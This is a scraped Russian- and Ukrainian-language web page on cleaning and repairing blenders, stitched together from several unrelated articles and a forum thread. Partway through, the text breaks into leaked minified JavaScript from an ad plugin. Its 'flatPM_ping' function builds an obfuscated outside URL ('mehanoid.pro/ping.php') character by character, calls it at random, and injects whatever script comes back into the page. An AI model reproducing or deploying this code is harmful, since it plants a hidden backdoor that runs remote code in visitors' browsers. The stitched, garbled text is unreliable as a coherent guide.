Как очистить блендер — гениальный лайфхак – Сам себе мастер – 26 января – 43206496008 – Медиаплатформа МирТесен

Как отмыть погружной блендер, чтобы не порезаться и сломать прибор

Практически уже не осталось семей, где на кухне нет блендера. Такой электрический кухонный прибор является необходимым помощником в повседневной жизни. Он сочетает в себе функции миксера и кухонного комбайна. С его помощью можно приготовить крем-пюре, различные эмульсии, детские каши, фруктовые коктейли, муссы и просто измельчить нужные продукты.

Для того чтобы чудо-блендер прослужил вам долго, следует за ним правильно ухаживать. Но наверняка вы задумываетесь о том, можно ли мыть блендер моющими средствами, и как это сделать правильно? В нашей статье мы рассмотрим множество советов о том, как мыть погружной блендер, который пользуется наибольшей популярностью у домохозяек.

К каждой модели блендера, будь он стационарный или погружной, обязательно входит в комплект инструкция, в которой прописано, как ухаживать за техникой. Если ее придерживаться, то техника прослужит эффективно не один год и будет только радовать своих хозяев.

Почему так важно вовремя чистить блендер?

Обычного протирания устройства с помощью дезинфицирующего средства недостаточно. Важно помнить, что в чаше блендера есть насадки, под которыми часто забиваются остатки пищи, они же могут оказаться намотанными на ротор.

Если все это своевременно не убирать, с течением времени блендер начнет испытывать сильную нагрузку, в результате двигатель просто не выдержит и сломается. Еще одна причина – гнилостный запах и бактерии, которые обязательно будут появляться, если вовремя не убирать остатки еды. Это не только не гигиенично – готовить с помощью такого блендера, но еще и опасно для здоровья.

Если же несовременно ухаживать за этой техникой, возможны следующие проблемы:

  • ножи начнут тупиться;
  • на чаше появятся царапины и налет из-за воздействия сухих кусочков пищи;
  • двигатель из-за большой нагрузки начнет «тормозить», работать медленнее.

Как итог – нормально измельчить продукты в таком блендере уже не получится.

И важный момент – техника, вышедшая из строя, не подлежит гарантийному ремонту, то есть поломки, вызванные неправильным уходом, придется оплачивать из своего кармана.

Что делать с едой, прилипшей к стенкам

Понятно, что если в блендере измельчали фрукты, овощи или готовили молочные коктейли, отмыть его будет не трудно. А что, если там готовили крем или взбивали сливочное масло с кусочками печенья? Да к тому же забыли о несчастном, так ничего и не отмыв.

В этом случае поможет пищевая сода, которую также необходимо добавить в горячую воду в равных пропорциях, а затем включить блендер.

По прошествии небольшого времени, слейте соду с водой и повторите способ №1.

Несмотря на то, что такой метод, бесспорно, очень быстрый и удобный, мы рекомендуем время от времени мыть не только саму чашу блендера, но и крышку, и ножи во избежание распространения бактерий.

Источник

Блендер з чашею подрібнювачем


Універсальні блендери, крім прямих насадок, укомплектовані чашею з S – подібним ножем для рубки м’яса, криги, горіхів тощо. (див. мал 4). У кришці чаші є шестерний редуктор, який зменшує швидкість обертання і збільшує силу руху лез.

Ось з цієї кришкою з шестернями слід бути особливо уважним. Обов’язково перевірте чи можна її мити з повним зануренням у воду, інакше редуктор може заклинити і деталь вийде з ладу, а в більшості випадків кришка з шестернями не розбирається і буде безнадійно зіпсована.

Ніж з валом і чаша миються досить легко. Якщо все ж таки залишилися прилиплі шматочки їх легко видалити теплою водою з миючим розчином. Навіть ножі можна очищати губкою, рухаючись від валу уздовж ножа. Будьте обережні – ножі дуже гострі.

Якщо виникнуть питання щодо вибору та режимів експлуатації побутової техніки для кухні, телефонуйте  (050) 414-92-73, будемо раді вам допомогти.

Важные советы как мыть блендер и чистить его насадки

Как очистить блендер — гениальный лайфхак - Сам себе мастер - 26 января - 43206496008 - Медиаплатформа МирТесен

Но как правильно ухаживать за такой техникой? Как мыть блендер правильно после использования и можно ли, к примеру, очистить его в посудомоечной машине?

Замена ножа

Если вдруг стационарный блендер перестал резать продукты, необходимо внимательно осмотреть нож. В случае поломки его придется поменять. Если он затупился, то достаточно наточить, но заточка обычно производится на специальном оборудовании. В любом случае, этот ремонт придется начинать со снятия ножа (для этого нужно знать, как устроен блендер).

Чтобы снять вышедший из строя нож, необходимо:

  • разобрать чашу, если в этом есть необходимость;
  • открутить гайки крепления ножа:
  • если гаек нет – сразу открутить нож.

Снимая нож, необходимо обмотать его плотной чистой тканью, чтоб не порезать пальцы. При разборке внимательно осмотрите чашу. Бывают модели с неразборными чашами. В таком случае придется менять последнюю вместе с ножом. Не забываем вместе с ножом поменять и сальник.

Гайки крепления ножа, как и сам нож, имеют левую резьбу. Откручивать их нужно по часовой стрелке, а закручивать наоборот – против часовой стрелки.

Как мыть погружной блендер

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(“flat_r_mb”,”zen.yandex”),flat_userVars.referer=”zen.yandex”);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,”<$1>”) r[2],l=r[0];l–;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “ng” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==l.indexOf(“go” “oglesyndication”)?t.append(l):flatPM_setHTML(t[0],l),e.find(“.flat__4_video_flex”).one(“click”,function(){n(this).addClass(“show”)})}),n(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=n(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),r=parseInt(o),l=setInterval(function(){a.text(–r),r<=0&&(clearInterval(l),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){n(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&n(“.flat__4_video_flex”).remove()})}

Как правильно очищать корпус

На рынке уже представлены модели, которые можно целиком погружать в воду, но большая часть блендеров от такой процедуры сразу же сломается. Если в инструкции к вашему прибору не указано, можно ли его мочить, не делайте этого ни в коем случае.

Читайте также:  Кухонные лопатки для переворачивания мяса

Чтобы очистить корпус (обычно он пластиковый), аккуратно протрите его влажной губкой с каплей моющего средства. Следите, чтобы влага не попала в стыки. После очищения обязательно протрите прибор сухой чистой тканью.

Часто грязь прячется между кнопками, в щелях корпуса. Справиться с ней поможет влажная зубная щетка или зубочистка. Делайте все аккуратно, с минимумом влаги.

Источник

Какие продукты нельзя измельчать в блендере?

Блендер – это маленький многофункциональный волшебник, упростивший женщинам работу на кухне. Смузи, крем-суп, пюре для детей, воздушное тесто для блинчиков, паштеты – с этим прекрасно справится компактный погружной аппарат. Стационарный агрегат обладает достаточной мощностью, чтобы превратить мясо в нежный фарш, наколоть лед для коктейлей, порезать или натереть овощи (если есть необходимая насадка) и многое другое.

Но, как и любая техника, блендер оснащен хрупким механизмом, и если вы будете эксплуатировать его неправильно, то вскоре вернетесь к своей старинной подружке-терке.

Некоторые продукты категорически нельзя измельчать в блендере! Какие? Читайте ниже.

Какие части нельзя мыть

Ни при каких обстоятельствах не подлежат мытью рукоять, провод и штепсельная вилка. Если в них попадёт вода, прибор будет безвозвратно испорчен.

Если по какой-то причине в рукоять с мотором попали капли, необходимо сразу отключить устройство от сети, желательно ослабить винты, разложить корпус, вытряхнуть воду и дать деталям высохнуть на воздухе.

Как ухаживать за рукояткой и проводом: предпочтительна сухая чистка, с помощью салфетки микрофибра, допустимо протереть корпус и провод влажной салфеткой, если прибор отключён от сети. Планово процедуру проводят раз в месяц или реже, в зависимости от того, как часто используется блендер.

Погружной блендер не требует больших усилий: чтобы он оставался чистым, его достаточно споласкивать после каждого использования. А если отпечатки случайно появились на рукояти — просто протрите влажной салфеткой, и прибор вновь будет чистым и эстетичным.

Привет всем самодельщикам и тем, кому часто приходится готовить на кухне!

В наше время, практически в каждом доме имеется такой кухонный прибор, как блендер. Он позволяет очень быстро готовить разнообразные блюда (пюре, соусы и т.п.), буквально за считанные секунды, измельчая и смешивая различные ингредиенты. Причем наибольшей популярностью пользуются погружные блендеры, поскольку ими можно измельчать и смешивать продукты в любой подходящей емкости.

Однако после приготовления блюда при помощи блендера, возникает необходимость мытья его рабочей насадки, в которой находится нож для измельчения продуктов. И тут частенько возникает проблема, поскольку отмыть насадку, особенно после приготовления вязкого и жирного блюда или соуса оказывается не так-то просто. Кроме того, при этом существует серьезная опасность пораниться об острый нож.

Тем не менее, есть очень простой способ, быстрого и легкого отмывания рабочей насадки блендера. Я уже давно пользуюсь этим способом и нужно сказать, что способ этот настолько прост и очевиден, что, по-видимому, довольно многие люди его используют.

Однако оказывается, что далеко не все догадываются об этом способе. Так недавно, будучи в гостях у своих знакомых, мне довелось видеть, как хозяйка после приготовления блюда, долго и упорно отмывала насадку блендера под краном и при этом едва не порезала палец об острый нож. Собственно этот факт и побудил меня к написанию этой статьи.

Итак, чтобы быстро и легко отмыть насадку блендера с ножом, после приготовления блюда, нужно налить чистой воды в глубокую миску, или, например, в пол-литровую банку и погрузив в нее насадку блендера, включить его несколько раз в течение 2-3 секунд.

При этом для лучшего отмывания, можно интенсивно подвигать блендер вверх-вниз или из стороны в сторону, как бы стремясь смешать или измельчить воду.

В результате нож блендера, вращаясь с большой скоростью в воде, прекрасно отмоет и себя и всю внутреннюю часть насадки. После этого останется только слегка сполоснуть насадку под краном, и она будет абсолютно чистой.

Так что все очень просто, быстро и безопасно!

Ну а меня на этом все! Всем пока и всегда чистых кухонных приборов и инструментов!

Как очистить блендер — гениальный лайфхак - Сам себе мастер - 26 января - 43206496008 - Медиаплатформа МирТесен

Но как правильно ухаживать за такой техникой? Как мыть блендер правильно после использования и можно ли, к примеру, очистить его в посудомоечной машине?

Кости

Профессиональные кулинары говорят, что неопытные повара часто совершают эту ошибку. При добавлении курицы или рыбы в блендер для приготовления фарша для фрикаделек или рыбных пирогов важно убедиться, что в мясе нет костей. Бытовые комбайны отличаются от промышленных – даже мелкие кости им «не по ножам».

Идеальное блюдо – это слои вкусов и текстур. Мясо, перемолотое в блендере, обладает консистенцией, которая придется по вкусу только малышам. Конечно, если вы готовите прикорм для младенца, то блендер – настоящий спаситель молодой мамы. Но для сочных нежных котлет с хрустящей корочкой нужна только мясорубка.

Мытье насадок и чаши

Самым легким и универсальным способом чистки насадок и чаши прибора — дополнительный цикл измельчения на самой медленной скорости с добавлением воды. Для этого нужно:

  • наполнить чашу на 2/3 теплой кипяченой водой;
  • добавить туда же пару капель моющего средства;
  • положить туда пару кусочков лимона для устранения неприятных запахов.

Затем из чаши нужно слить грязную воду, залить дезинфицирующий раствор и включить еще раз режим измельчения на минимальной скорости. После этого очистка окончена.

Очистить нож прибора от фарша и других кусочков еды можно, сняв его с соблюдением инструкции. Чистку нужно проводить мягкой влажной губкой. Насадки для взбивания следует промыть под струей проточной воды, а после работы с яйцами еще дополнительно к этому обработать дезинфицирующим раствором.

Если смесь в блендере уже засохла на стенках чаши, то ее и ножи нужно замочить на несколько часов в мыльной воде, а затем помыть губкой с моющим средством. Но этот способ подходит только для разборных моделей.

Если же блендер неразборный, то чашу нужно наполнить на 2/3 теплой водой, добавить туда две чайные ложки пищевой соды, 50 мл уксуса и 5−10 капель средства для мытья посуды. Включить блендер на самый медленный режим измельчения на 15 секунд и оставить, не сливая, примерно на 8 часов.

Читайте также:  Диван на дачу своими руками из дерева и угловой из поддонов

В случае, если не помог ни один из вышеперечисленных способов, прибор нужно сдать в сервисный центр для проведения более тщательной очистки с полным его разбором. Но лучше не допускать этого и своевременно очищать технику сразу после окончания работы с ней.

Неисправность переключателя скоростей

Чтобы проверить и отремонтировать переключатель скоростей на стационарном или погружном блендере, нужно немного разбираться в радиотехнике и уметь пользоваться паяльником. В домашних условиях полную проверку этого узла выполнить невозможно. А сделать это нужно обязательно.

Для ремонта необходимо выпаять плату и «прозвонить» ее. Если при переключении контакты поочередно замыкаются (щелкают), то переключатель находится в рабочем состоянии. Если этого не происходит, то придется ремонтировать его в мастерской или сервисном центре.

Не забывайте о блокировке от включения без чаши. В противном случае можно выбросить вполне работоспособную деталь.

Общие принципы ухода

При правильном подходе к эксплуатации и чистке оборудование вполне способно служить годами. Особенно учитывая, что сейчас доступны запчасти для ручного блендера практически любой модели. Можно вовремя сменить нож, любой элемент корпуса, уплотнитель или даже электронную плату, чтобы пользоваться устройством дальше. Чтобы прибор исправно служил, очищать его нужно регулярно.

Мыть насадки, ножи и чашу, как ни крути, придется после каждого использования. Корпус и крышка тоже не должны оставаться без внимания. Очищать их нужно очень бережно и относительно редко – раз-два в месяц (при активном использовании).

Еще несколько общих советов:

  • отметка Max на чаше – это не просто черточка, а действительно последний граничный предел, до которого можно загружать продукты. В противном случае перегруз прибора приведет к износу двигателя, и блендер прослужит гораздо меньше, чем мог бы;
  • уплотнитель тоже требует внимания. Время от времени аккуратно смазывайте его растительным маслом, чтобы избежать пересыхания и продлить срок службы;
  • никогда не оставляйте блендер грязным, особенно если он снабжен пластиковой чашей. Иначе неприятный запах вам гарантирован, да и засохшие остатки пищи с погружной насадки отмыть крайне трудно;
  • найдите сухое и чистое место для хранения прибора. Не оставляйте его на рабочей поверхности, где ему грозят пыль, брызги воды и жира.

Главное – беречь корпус от попадания внутрь влаги. Именно это является самой частой причиной «преждевременной кончины» отличного электроприбора.

Общие сведения

Обычного протирания губкой, даже с дезинфицирующим средством, недостаточно для нормального ухода за блендером. В его чаше крепятся насадки, под которые забиваются остатки измельченной смеси, а на ротор наматываются кусочки фарша. Если своевременно все это не убрать, то двигатель, из-за чрезмерной нагрузки, довольно быстро выйдет из строя.

Как чистить блендер и какие могут возникнуть сложности? Например, производитель строго запрещает погружать такую технику в воду, а сама основа, где находится фильтр и переходный вал на чашу, могут быть несъемными. Если внутрь попадет вода, то начнется коррозия двигателя (хотя чаще от этого страдают именно печатные платы, на которых расположены тумблеры управления режимами работы электромотора).

Фото469

  • затупятся ножи;
  • чаша покроется налетом и царапинами из-за сухих остатков пищи;
  • двигатель не будет выдавать заявленное количество оборотов.

Соответственно, такой техникой нормально измельчить продукты уже не получится. И под гарантийный ремонт подобные поломки, спровоцированные неправильным уходом, не подпадают.

Отказ работы двигателя

Иногда случается так, что блендер совсем не хочет работать. Здесь причин несколько. Во-первых, может выйти из строя блокировка отсутствия чаши. В этом случае достаточно прислушаться к включенному блендеру. Если слышно тихое жужжание, а нож при этом стоит на месте, то возможно, сработал механизм блокировки.

Необходимо снять чашу, и длинным предметом (например, карандашом) нажать на кнопку блокировки. Если после этого блендер не заработал, то, скорее всего, проблема в двигателе. Большая вероятность того, что сгорела обмотка. В этом случае выход один – менять двигатель.

Если повезло, и двигатель оказался исправным, переходим к следующему этапу проверки. Для начала убедимся в том, что в розетке напряжение все-таки имеется. Для этого включаем в нее другой электроприбор. Если он работает, значит с розеткой все в порядке.

Следующий этап – проверка шнура питания блендера. Работа несложная, но вам придется разобрать корпус (здесь могут пригодиться советы по разборке погружных блендеров Bosch ). Кстати, прежде чем это делать, необходимо убедиться в наличии предохранителя. Если он сгорел — меняем на аналогичный. Часто после выполнения этих простых операций блендер начинает работать.

Предохранитель всегда должен соответствовать номиналу. Установка самодельных предохранителей («жучков») приводит к пожару.

Если эта операция не восстановила работоспособность агрегата, продолжаем проверять шнур питания. Включив вилку в розетку необходимо вольтметром (тестером) замерить напряжение, подходящее к предохранителю или к силовому разъему. Если напряжение есть – значит, шнур питания исправен. Если нет, то его нужно просто заменить на новый.

Встречаются силовые разъемы, полностью залитые пластиком, без доступа к контактам. В этом случае можно аккуратно вставить через изоляцию проводов иголки с припаянными к ним проводами и подсоединить их к вольтметру.

Иногда случается и такая ситуация: при включении вилки в розетку предохранитель сразу же сгорает. Это означает, что внутри прибора произошло короткое замыкание. Оно может быть в двигателе или в блоке электронной системы. Ремонт в этом случае несложный: определив место замыкания или обрыва цепи, нужно заменить неисправный блок.

Если проблема в двигателе – меняем его, если в электронике – меняем плату. Определить неисправность электронной платы также не составит большого труда. Нужно ее внимательно осмотреть. Если при осмотре выявлены вздутия конденсаторов, нагар на резисторах или разрывы и отслаивания токопроводящих дорожек печатной платы, то можно с уверенностью предположить, что неисправность кроется именно здесь.

Перед ремонтом прибор необходимо отключить от сети.

Подтекание в чаше

Редко, но иногда наблюдается такая картина – блендер работает нормально, но вокруг появляются лужи. Подобная неисправность возникает обычно при протекании сальника. Ремонт заключается в его замене на новый. Однако перед заменой убедитесь, что в чаше нет трещин.

Никогда не загружайте чашу полностью. В этом случае течь из-под крышки неизбежна.

Читайте также:  Подсветка для кухни под шкафы светодиодная. Как сделать, инструкции, материалы

Блендер устроен довольно просто. Как видим, достаточно починить один узел, и работоспособность прибора восстановится. Наряду с пользой, делать ремонт самому еще и увлекательно.

Регулярный уход

Самое главное — мыть блендер погружной после каждого использования, не дожидаясь, пока остатки продуктов присохнут. Как правильно это сделать:

  1. Наполнить стакан от блендера или другую подходящую ёмкость тёплой, 40—60 градусов, водой.
  2. Капнуть средство для посуды, можно не размешивать.
  3. Собрать и подключить в сеть блендер.
  4. Опустить ногу в воду и включить прибор на 1—3 минуты.
  5. Выключить устройство, отсоединить от сети и снять ногу.
  6. Прополоскать её под проточной водой и разместить в подставке для столовых приборов раструбом вверх.

Не рекомендуется вытирать блендер насухо, особенно ножи: так легко поранить пальцы. Достаточно встряхнуть, чтобы избавиться от капель, и оставить сохнуть на воздухе.

Сложные загрязнения

Если случилось, что блендер успел засохнуть, и обычное мытьё не справляется с загрязнениями, ногу стоит замочить. Не нужно применять агрессивные щёлочи или кислоты, в том числе «Доместос», «Саниту» и т. п.

Не допустимы абразивные порошки, щётки и металлические губки: корпус и ножи покроют царапины, из-за которых частицы пищи будут вымываться всё сложнее, и прибор станет негигиеничным.

Чтобы избавиться от сложных, присохших остатков пищи, достаточно опустить ногу в тёплый раствор геля для посуды и подержать в нём около 20 минут. Затем помыть обычным способом. Допустимо слегка потереть ножи и корпус ершом или щёткой с мягкой щетиной. Ни в коем случае не руками!

Важно
Журнал «Мисс Чистота», изучив вопрос, настоятельно не рекомендует мыть ногу погружного блендера в посудомоечной машине. Алюминиевые и пластиковые части повредятся из-за щёлочи в моющем средстве.

Чистимо стаціонарний блендер з чашею (він же шейкер)

У цих приладів велика скляна або полімерна чаша, на дні якої розташовані ножі подрібнювачі. Дістатися до них щіткою і очистити механічно непросто, але такий блендер легко очистити, якщо залити в чашу теплу воду з додаванням засобу для миття посуду і запустити на півхвилини, на середній швидкості див. мал 1 а, в.

Більшість фрагментів змиються відразу, а особливо завзяті відокремляться, якщо залишити розчин в чаші на півгодини. Далі потрібно промити чашу під струменем чистої води.


Перед тим як прибрати прилад на зберігання висушіть його, а то може з’явитися затхлий запах.

Стаціонарну частину з двигуном і перемикачем мити не можна, при необхідності поверхню протирається вологою ганчіркою або серветкою з мильним розчином.

Чистка главной части с мотором

Основную часть блендера любого типа, в которой расположен двигатель, обычно нет необходимости мыть, так как туда не попадает пища. Но если вы все-таки испачкали эту деталь, то достаточно будет протереть ее влажной губкой, предварительно отключив прибор от источника питания. Для прорезиненых частей губку потребуется сильнее намочить, так как эти области отмывать сложнее.

Некоторые модели блендеров разрешено мыть в посудомоечной машине. Это можно узнать в инструкции к изделию.

Вот основные рекомендации по уходу за блендером, которые важно запомнить:

  • Первым делом обязательно ознакомьтесь с рекомендациями по уходу за изделием, которые находятся в инструкции.
  • С разборными моделями обычно проблем не возникает, модульные же главное вовремя чистить, не допуская засыхания пищи.
  • Хранить прибор и все детали к нему нужно абсолютно сухим.

Итак, нужно строго соблюдать все инструкции по эксплуатации прибора, иначе с большой долей вероятности он в скором времени выйдет из строя.

Девушки, дурацкий вопрос конечно )))) купили блендер, про погружную часть все понятно, можно мыть под краном. Но! к нему еще есть чаша с ножами и крышкой, написано что крышку нельзя мыть в посудомойке и под краном. И как ее мыть тогда. тряпочкой вряд ли удастся фарш отмыть(((( а вы как делаете?

А что за блендер?

У меня Браун. Так вот крышку я спокойно мою под краном… там же переходник есть для соединения, может в нем дело?

Источник

Як відмити занурювальний блендер

Якщо вінчик для збивання блендеру або навіть потужного міксеру очистити просто, то з ніжкою, в якій знаходяться ножі, захищені від випадкового дотику спеціальної спідничкою (див. мал 2,) доведеться повозитися.

Добре якщо корпус ніжки металевий див. мал 3. Такий блендер можна опускати в гарячу їжу, а також прокип’ятити насадку в окремій каструлі або прогнати в посудомийній машині на максимальному режимі.


УВАГА! Не намагайтеся продезенфікувати деталі блендера в духовці або мікрохвильовій печі. У першому випадку ви зіпсуєте ущільнення і втулки обертання валу, а в другому – спалите мікрохвильовку.

Після мийки та термообробки приєднаєте до ніжки моторний блок, опустіть її в теплу (а металеву можна в гарячу) воду і включіть на 20-25 секунд. Огляньте ножі, при необхідності включіть і опустіть у воду повторно.

Якщо залишки розм’якшеного бруду залишилися на валу або під ножами, видаліть їх за допомогою ватної палички, і промийте насадку під сильним струменем води.

Заключение

Итого, очистка блендера начинается с ознакомления с рекомендациями производителя. С разборными моделями проблем вообще не возникает, с модульными главное своевременно выполнять чистку.

Хранить все детали и сам прибор нужно полностью высушенным

Ни в коем случае не следует нарушать правила, указанные в инструкции по эксплуатации. Их игнорирование с большей долей вероятности приведет к выходу техники из строя.

Если возник этот вопрос, скорей всего блендер не помыли сразу и мелкие кусочки приклеились к ножам и стенкам чаши. Кипятком ведь пластиковые детали не обдашь, а ножи не обработаешь ершиком. Хорошо если есть посудомоечная машина, но не повредят ли моющие средства и горячий воздух режима сушки редуктору или пластиковым деталям?

Добавить комментарий

Ваш адрес email не будет опубликован.

Adblock
detector